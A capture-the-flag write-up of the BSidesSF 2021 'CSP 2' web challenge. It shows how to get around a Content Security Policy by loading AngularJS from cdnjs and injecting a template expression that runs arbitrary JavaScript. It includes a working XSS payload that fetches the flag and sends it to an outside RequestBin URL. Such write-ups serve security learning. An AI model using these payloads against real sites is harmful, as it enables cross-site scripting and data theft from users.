Rating:
Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2) for writeup with images.
---
This challenge was simmilar to the last one where we need to send an XSS
payload to an admin to get the flag.
Checking the CSP this time we have:
```javascript
script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report
```
This one has the issue of using `script-src` from cdnjs.cloudflare.com. If we can
use a script from CloudFlare to execute arbitrary JS, we win!
To do this we can use Angular to evaluate JS within an Angular context.
Here's a simple example to test:
```javascript
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('alert(1)')()}}
```
This payload seems to work!
Now we just need to exfiltrate the flag like the last challenge using fetch.
```javascript
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('fetch("/csp-two-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/1m40bkh1?x=" + t))')()}}
```
Then we get the Flag on RequestBin:
```
CTF{Can_Still_Pwn}
```
